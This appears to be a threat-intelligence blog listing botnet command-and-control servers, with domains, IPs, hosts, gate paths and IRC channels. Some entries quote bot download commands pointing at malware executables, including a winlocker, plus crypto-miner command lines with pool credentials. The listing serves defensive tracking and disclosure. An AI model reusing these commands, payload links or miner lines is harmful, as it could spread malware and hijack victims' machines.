Server: imgay.ddos.es Gate file: /h/order.php Alternate domains: imgay.ddos.cat imgay.theswat.net ddos.cat has been linked to botnets before Hosting infos: ;; QUESTION SECTION: ;imgay.ddos.es. IN A ;; ANSWER SECTION: imgay.ddos.es. 149 IN A 94.27.87.58 imgay.ddos.es. 149 IN A 98.195.89.225 imgay.ddos.es. 149 IN A 174.112.126.155 imgay.ddos.es. 149 IN A 176.40.77.176 imgay.ddos.es. 149 IN A 178.150.207.252 imgay.ddos.es. 149 INRead more...
wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)
Resolved wrightfeldhusen.info to 69.197.35.109 Server: wrightfeldhusen.info Gate file: /beta/order.php Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info This is hosted on the same server as this andromeda bot. Hosting infos: http://whois.domaintools.com/69.197.35.109
fuckencio.com (Betabot http botnet hosted by offshoreracks.com)
Resolved fuckencio.com to 190.14.38.133 Server: fuckencio.com Gate file: /wordpress/order.php Alternate domains: clarocontigosiempre.mobi clarocontigosiempre.us Hosting infos: http://whois.domaintools.com/190.14.38.133
www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)
Resolved www.panel-gc.co.uk to 69.197.35.109 Server: www.panel-gc.co.uk Gate file: /panel/gate.php Plugins: hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod This is andromeda 2.7, not the older cracked version. Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo Hosting infos: http://whois.domaintools.com/69.197.35.109
srv5.su (snk asper mod irc botnet hosted by softronics.ch)
Resolved srv5.su to 94.242.198.64 Server: srv5.su Port: 5050 Channel: #ok #ok :.j #spr .j #lock .j #spam #ok :.d p /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/114/105/119/81/50/105/98/117/ Downloads hxxp://94.242.198.64/4/smart.exe Channel: #spr #spr :.d x /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/111/122/100/11/121/116/127/ Downloads hxxp://94.242.198.64/4/spra.exe Channel: #lock #lock :.d l /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/96/112/107/110/11/121/116/127/ Downloads hxxp://94.242.198.64/4/lock.exe (winlocker) Channel: #spam #spam :.s.a /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/111/119/109/102/78/50/105/98/117/ /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/57/48/ 49 meeisodf Alternate domain: srv50.su Hosting infos: http://whois.domaintools.com/94.242.198.64
strike-digital.info (Fenix irc botnet hosted by santrex.net)
Resolved strike-digital.info to 46.166.184.109 Server: strike-digital.info Port: 8888 Channel: #Fenix Channel password: nxnxnx A betabot belonging to the same guy is hosted on the same ip. Hosting infos: http://whois.domaintools.com/46.166.184.109
guard4you.info (Betabot http botnet hosted by ecatel.net)
Resolved guard4you.info to 80.82.66.26 Server: guard4you.info Gate file: /customer/order.php Alternate domains: nexusguardian.info vote4us.info meet2n8.info This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably allRead more...
208.89.209.54 (Irc botnet hosted by virpus.com)
Server: 208.89.209.54 Port: 6667 Current global users 77, max 695 Channels: #goon 3 #aryan 39 #OFFLINE#flood 1 ##yBz## 15 ##Offline## 19 Aryan bots: Channel: #aryan Topic for #aryan is: #OFFLINE Topic for #aryan set by formality at Sun May 05 16:23:03 2013 Linux bots: Channel: ##Offline## Channel: ##yBz## Hosting infos: http://whois.domaintools.com/208.89.209.54
betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4 Server: betabros.in Gate file: /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...
jkdef8.ws (Betabot http botnet hosted by ecatel.net)
Resolved jkdef8.ws to 94.102.51.117 Server: jkdef8.ws Gate file: /papka/order.php Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x Hosting infos: http://whois.domaintools.com/94.102.51.117